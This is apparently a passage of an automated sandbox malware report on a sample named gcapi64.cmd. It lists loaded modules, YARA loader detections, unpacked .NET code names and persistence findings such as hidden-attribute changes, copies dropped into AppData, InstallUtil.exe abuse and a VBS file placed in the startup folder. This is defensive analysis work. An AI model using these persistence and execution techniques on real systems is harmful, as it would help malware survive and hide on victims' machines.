                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: atiadlxy.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dll
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dll
                    Source: C:\Windows\System32\xcopy.exeSection loaded: devobj.dll
                    Source: C:\Windows\System32\xcopy.exeSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: atl.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: msisip.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: wshext.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: gcapi64.cmdStatic file information: File size 2251942 > 1048576
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: gcapi64.cmd.Kwj, 00000005.00000002.1852130887.0000025825B89000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.2082739360.000002583DE30000.00000004.08000000.00040000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.1996056904.00000258351F4000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.1996056904.000002583547D000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BCCBA000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183AC6EC000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: gcapi64.cmd.Kwj, 00000005.00000002.1852130887.0000025825B89000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.2082739360.000002583DE30000.00000004.08000000.00040000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.1996056904.00000258351F4000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.1996056904.000002583547D000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BCCBA000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183AC6EC000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdbUGP source: gcapi64.cmd.Kwj, 00000005.00000000.1656117411.00007FF67B75A000.00000002.00000001.01000000.00000003.sdmp, gcapi64.cmd.Kwj.18.dr, gcapi64.cmd.Kwj.3.dr
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdb source: gcapi64.cmd.Kwj, 00000005.00000000.1656117411.00007FF67B75A000.00000002.00000001.01000000.00000003.sdmp, gcapi64.cmd.Kwj.18.dr, gcapi64.cmd.Kwj.3.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.gcapi64.cmd.Kwj.25835b0c998.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 5.2.gcapi64.cmd.Kwj.258353cb6b0.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.gcapi64.cmd.Kwj.258353cb6b0.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.gcapi64.cmd.Kwj.258353cb6b0.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 5.2.gcapi64.cmd.Kwj.258368acc08.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 5.2.gcapi64.cmd.Kwj.258368acc08.2.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 5.2.gcapi64.cmd.Kwj.258368acc08.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 5.2.gcapi64.cmd.Kwj.258368acc08.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 5.2.gcapi64.cmd.Kwj.258368acc08.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 5.2.gcapi64.cmd.Kwj.2583d520000.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 5.2.gcapi64.cmd.Kwj.2583d520000.7.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 5.2.gcapi64.cmd.Kwj.2583d520000.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 5.2.gcapi64.cmd.Kwj.2583d520000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 5.2.gcapi64.cmd.Kwj.2583d520000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 5.2.gcapi64.cmd.Kwj.2583de30000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.gcapi64.cmd.Kwj.2583de30000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.gcapi64.cmd.Kwj.2583de30000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 5.2.gcapi64.cmd.Kwj.2583685cbd0.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 5.2.gcapi64.cmd.Kwj.2583685cbd0.4.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 5.2.gcapi64.cmd.Kwj.2583685cbd0.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 5.2.gcapi64.cmd.Kwj.2583685cbd0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 5.2.gcapi64.cmd.Kwj.2583685cbd0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 21.2.InstallUtil.exe.1c9d5d7c5d8.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.InstallUtil.exe.1c9c5c75118.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.16b9915aa98.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.16b99182ad0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.16b9915aa98.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.InstallUtil.exe.1c9d5df4648.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.16b994546f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.16b994f4728.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.InstallUtil.exe.1c9de4f0000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.InstallUtil.exe.1c9c5c75118.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.InstallUtil.exe.1c9d5da4610.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.InstallUtil.exe.1c9d5da4610.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.InstallUtil.exe.1c9d5d7c5d8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.2.InstallUtil.exe.1c9d61146f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.gcapi64.cmd.Kwj.2583dc00000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000015.00000002.2426048985.000001C9C5C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2079460129.000002583DC00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2524944818.000001C9DE4F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2457809990.000001C9D5C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2929418209.0000016B88F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1852130887.00000258253A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2944055026.0000016B990BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2944055026.0000016B994F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2944055026.0000016B99454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2107099890.00000183ABDA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: gcapi64.cmd.Kwj PID: 7544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8052, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: gcapi64.cmd.Kwj PID: 2640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2004, type: MEMORYSTR
                    Source: gcapi64.cmd.Kwj.3.drStatic PE information: 0x7EDA4115 [Wed Jun 10 07:45:25 2037 UTC]
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9B6C7969 push ebx; retf 5_2_00007FFD9B6C796A
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9B6C6075 push 9F000001h; ret 5_2_00007FFD9B6C607A
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9B6CEFE5 pushad ; ret 5_2_00007FFD9B6CF269
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9B7933C6 pushfd ; ret 5_2_00007FFD9B7933C7
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9B7936D6 push cs; retf 5_2_00007FFD9B7936D7
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9BA15995 push ebx; retf 5_2_00007FFD9BA159DA
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9BA0000A push eax; retf 5_2_00007FFD9BA00099
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B5CD2A5 pushad ; iretd 6_2_00007FFD9B5CD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B7B2316 push 8B485F91h; iretd 6_2_00007FFD9B7B231B
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B8E11DD push ebp; ret 10_2_00007FFD9B8E11DF
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 10_2_00007FFD9B8EADD7 push esp; ret 10_2_00007FFD9B8EADD9
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9B6DF2CF push eax; iretd 20_2_00007FFD9B6DF339
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9B6DF2F9 push eax; iretd 20_2_00007FFD9B6DF339
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9B6D5CB2 push ebp; iretd 20_2_00007FFD9B6D5CB8
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9B6D5C65 push 9F000001h; ret 20_2_00007FFD9B6D5C6A
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9B7A581F push ds; retf 5F3Fh20_2_00007FFD9B7A5B0F
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9B7A37F1 push edi; retf 20_2_00007FFD9B7A37F2
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9B7A1F61 push ebp; retf 20_2_00007FFD9B7A21F2
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9B7A0715 push edx; retf 20_2_00007FFD9B7A0732
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9B7A3CE1 push ecx; retf 20_2_00007FFD9B7A3CDA
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9B7A7540 push ebx; iretd 20_2_00007FFD9B7A7541
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9B7A3CB9 push ecx; retf 20_2_00007FFD9B7A3CDA
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9BA180F8 push ebx; ret 20_2_00007FFD9BA1816A
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjCode function: 20_2_00007FFD9BA180FC push ebx; ret 20_2_00007FFD9BA1816A

                    Persistence and Installation Behavior

                    barindex
                    Uses cmd line tools excessively to alter registry or file data
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjJump to dropped file
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\gcapi64.cmd.KwjJump to dropped file
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\gcapi64.cmd.KwjJump to dropped file
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\InstallUtil.exe.log

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
